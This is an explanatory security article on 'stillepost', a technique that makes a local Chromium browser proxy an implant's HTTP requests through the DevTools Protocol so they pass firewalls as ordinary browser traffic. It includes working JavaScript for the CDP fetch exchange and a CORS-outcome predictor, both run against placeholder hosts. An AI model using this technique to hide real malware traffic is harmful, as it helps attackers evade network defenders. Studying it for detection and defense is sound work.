Covert Channels: Stillepost Turns Chromium Browser into Stealth Application-Layer Proxy
A project called stillepost demonstrates an unusual technique that turns an ordinary Chromium-based browser into an application-layer proxy for HTTP traffic. The idea is that the “implant” never connects to the internet directly; instead, it communicates with a locally running Chromium instance and, via the Chrome DevTools Protocol, compels the browser to issue the required HTTP requests on its behalf. To the outside world, this activity appears indistinguishable from normal browser behavior, while all proxy settings, authentication, and PAC logic are automatically inherited from the browser profile—one that is typically already permitted by network policies and firewalls.
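The following is an added example, not code from the stillepost repository, showing the Chrome DevTools Protocol exchange the technique relies on: the implant sends a Runtime.evaluate frame whose expression is a fetch() that runs inside an open tab, and reads the result back from the reply. Runtime.evaluate, awaitPromise, returnByValue and exceptionDetails are real CDP fields; the request shape ({url, method, headers, body}), the function names, the sample replies and the assumption that the browser was started with --remote-debugging-port are this example's own, not the library's API.

```javascript
// Added example, not stillepost's own code: the Chrome DevTools Protocol (CDP)
// exchange that makes a local Chromium tab issue an HTTP request for the caller.
// Runtime.evaluate, awaitPromise and returnByValue are real CDP fields; the
// request shape ({url, method, headers, body}) and the function names are this
// example's own choices, not the library's API.

function buildFetchExpression(req) {
  // The expression runs inside an already-open page, so it is an ordinary
  // cross-origin fetch() and is subject to that page's CORS rules. The browser
  // applies its own proxy settings, PAC script and proxy authentication to it.
  const init = {
    method: req.method || 'GET',
    headers: req.headers || {},
    mode: 'cors',
    credentials: 'omit',
  };
  if (req.body !== undefined) init.body = req.body;
  // Status, headers and body are packed into one plain object so that
  // Runtime.evaluate can hand them back by value.
  return `(async () => {
    const r = await fetch(${JSON.stringify(req.url)}, ${JSON.stringify(init)});
    return { status: r.status,
             headers: Object.fromEntries(r.headers.entries()),
             body: await r.text() };
  })()`;
}

function buildEvaluateMessage(id, req) {
  // One CDP request frame. `id` is echoed back so replies can be matched.
  return {
    id,
    method: 'Runtime.evaluate',
    params: {
      expression: buildFetchExpression(req),
      awaitPromise: true,  // settle the fetch() promise before replying
      returnByValue: true, // serialise the result instead of a remote object handle
    },
  };
}

function parseEvaluateReply(msg) {
  // A reply carries either result.result.value, or exceptionDetails when the
  // expression threw. A CORS refusal shows up here as a TypeError ("Failed to
  // fetch") raised by the browser, not as an HTTP status from the server.
  if (msg.error) {
    return { ok: false, error: `CDP error ${msg.error.code}: ${msg.error.message}` };
  }
  const ex = msg.result && msg.result.exceptionDetails;
  if (ex) {
    const description = (ex.exception && ex.exception.description) || ex.text;
    return { ok: false, error: description };
  }
  return { ok: true, response: msg.result.result.value };
}

// Constructed sample replies (the shape CDP uses; the values are made up).
const SAMPLE_OK_REPLY = {
  id: 1,
  result: { result: { type: 'object', value: { status: 200, headers: { 'content-type': 'text/plain' }, body: 'hello' } } },
};
const SAMPLE_CORS_FAILURE_REPLY = {
  id: 2,
  result: {
    result: { type: 'object', subtype: 'error', className: 'TypeError', description: 'TypeError: Failed to fetch' },
    exceptionDetails: {
      exceptionId: 1, text: 'Uncaught (in promise)', lineNumber: 0, columnNumber: 0,
      exception: { type: 'object', subtype: 'error', className: 'TypeError', description: 'TypeError: Failed to fetch' },
    },
  },
};

async function sendViaBrowser(wsUrl, req, id = 1) {
  // Transport (assumed, not from the page): needs a WebSocket implementation
  // (Node 22+ global or the `ws` package) and a browser started with
  // --remote-debugging-port; wsUrl is a page target's webSocketDebuggerUrl as
  // listed at http://127.0.0.1:9222/json.
  const ws = new WebSocket(wsUrl);
  await new Promise((res, rej) => { ws.onopen = res; ws.onerror = rej; });
  const reply = new Promise((res) => {
    ws.onmessage = (ev) => { const m = JSON.parse(ev.data); if (m.id === id) res(m); };
  });
  ws.send(JSON.stringify(buildEvaluateMessage(id, req)));
  const result = parseEvaluateReply(await reply);
  ws.close();
  return result;
}

// Stand-alone demo over the constructed replies (no browser needed).
console.log(JSON.stringify(buildEvaluateMessage(1, {
  url: 'https://example.test/api', method: 'POST',
  headers: { 'Content-Type': 'application/json' }, body: '{"k":1}',
})));
console.log(parseEvaluateReply(SAMPLE_OK_REPLY));
console.log(parseEvaluateReply(SAMPLE_CORS_FAILURE_REPLY));
```

The point to notice is where failures surface: a server-side error arrives as an ordinary status code inside result.result.value, whereas a policy refusal by the browser (CORS, mixed content, a blocked URL) never reaches the server and comes back as exceptionDetails. A proxy built on this exchange has to distinguish the two, because only the first means the target was actually contacted.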
In the repository, the technique is packaged as a small library named stillepost, which exposes three core functions: environment initialization, execution of an HTTP request through the browser, and graceful shutdown with proper resource cleanup. JSON parsing is handled through the bundled cJSON dependency, avoiding any external installation requirements. As a demonstration, the author provides a ready-made C client that sends a POST request via Edge, along with a minimal Python test server to observe the “browser-originated” requests during development. The original Python prototype used to validate the concept has also been preserved.
The approach, however, comes with a significant limitation: because the request is issued by page script inside the browser, it is subject to CORS, so it works only when the target web server permits cross-origin requests from arbitrary origins. In testing, the author relied on a server that explicitly set Access-Control-Allow-Origin: * and allowed the necessary methods and headers, so that the browser would not block the request. Without those headers the browser enforces the policy itself: a request that requires a preflight (a non-simple method, a JSON content type, or any custom header) is never sent because the OPTIONS check fails, and a simple request does reach the server but its response is withheld from the page, so the implant never sees the reply. Either way, traffic cannot be transparently relayed within the user's context.
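To make the CORS limitation concrete, here is an added example (not from the stillepost repository) that predicts, from a target server's Access-Control-* headers, whether a browser-proxied request will leave the browser at all and whether the page can read the reply. The rules are the standard Fetch/CORS ones for a request made with credentials omitted; the origin, the requests and the server header sets at the bottom are constructed sample inputs, and the function names are this example's own.

```javascript
// Added example, not stillepost's own code: predicts from the target server's
// CORS headers whether a browser-proxied request will be sent at all and whether
// the page can read the reply. The rules are the standard Fetch/CORS ones for a
// request made with credentials omitted; the request and header values at the
// bottom are constructed sample inputs.

const SAFELISTED_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SAFELISTED_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
const SAFELISTED_CONTENT_TYPES = new Set(['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain']);

function unsafeHeaderNames(req) {
  // Header names that force a preflight. Content-Type counts as unsafe unless
  // its MIME type is one of the three form-style types. (The spec's per-value
  // length limits are omitted here.)
  const names = [];
  for (const [name, value] of Object.entries(req.headers || {})) {
    const n = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(n)) { names.push(n); continue; }
    const mime = String(value).split(';')[0].trim().toLowerCase();
    if (n === 'content-type' && !SAFELISTED_CONTENT_TYPES.has(mime)) names.push(n);
  }
  return names;
}

function needsPreflight(req) {
  // "Simple" requests are sent immediately, and the server receives them even
  // when the page is later denied the response. Everything else is preceded by
  // an OPTIONS preflight; if that fails, the real request is never sent.
  const method = (req.method || 'GET').toUpperCase();
  return !SAFELISTED_METHODS.has(method) || unsafeHeaderNames(req).length > 0;
}

function headerList(value) {
  return value ? String(value).split(',').map((s) => s.trim().toLowerCase()).filter(Boolean) : [];
}

function corsVerdict(req, origin, serverHeaders) {
  // serverHeaders: the Access-Control-* headers the server returns (to the
  // preflight, or to the actual request for simple ones). Returns whether the
  // request leaves the browser and whether the response is readable by the page.
  const h = {};
  for (const [k, v] of Object.entries(serverHeaders)) h[k.toLowerCase()] = v;
  const preflight = needsPreflight(req);
  const allowOrigin = h['access-control-allow-origin'];
  if (allowOrigin !== '*' && allowOrigin !== origin) {
    return { sent: !preflight, readable: false, reason: 'Access-Control-Allow-Origin does not cover the page origin' };
  }
  if (!preflight) return { sent: true, readable: true, reason: 'simple request, no preflight' };
  const method = (req.method || 'GET').toUpperCase();
  const methods = headerList(h['access-control-allow-methods']);
  if (!SAFELISTED_METHODS.has(method) && !methods.includes(method.toLowerCase()) && !methods.includes('*')) {
    return { sent: false, readable: false, reason: `method ${method} missing from Access-Control-Allow-Methods` };
  }
  const headers = headerList(h['access-control-allow-headers']);
  for (const n of unsafeHeaderNames(req)) {
    // "*" covers every header except Authorization, which must be listed by name.
    const covered = headers.includes(n) || (headers.includes('*') && n !== 'authorization');
    if (!covered) return { sent: false, readable: false, reason: `header ${n} missing from Access-Control-Allow-Headers` };
  }
  return { sent: true, readable: true, reason: 'preflight satisfied' };
}

// Constructed sample inputs.
const ORIGIN = 'https://intranet.example.test'; // origin of the tab the implant drives
const JSON_POST = { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: '{"k":1}' };
const FORM_POST = { method: 'POST', headers: { 'Content-Type': 'text/plain' }, body: 'k=1' };
const PERMISSIVE_SERVER = {
  'Access-Control-Allow-Origin': '*',
  'Access-Control-Allow-Methods': 'POST, OPTIONS',
  'Access-Control-Allow-Headers': 'Content-Type',
};
const STRICT_SERVER = {}; // no CORS headers at all

console.log(corsVerdict(JSON_POST, ORIGIN, PERMISSIVE_SERVER)); // sent and readable
console.log(corsVerdict(JSON_POST, ORIGIN, STRICT_SERVER));     // preflight fails, nothing sent
console.log(corsVerdict(FORM_POST, ORIGIN, STRICT_SERVER));     // sent, but the reply is withheld
```

The three sample verdicts map onto the article's limitation: the permissive server is the configuration the author tested against, where a JSON POST succeeds end to end; against a server with no CORS headers the same JSON POST never leaves the browser because the preflight fails; and a text/plain POST to that same server is still transmitted, so the target does receive the data, but the page (and therefore the implant) is never shown the response.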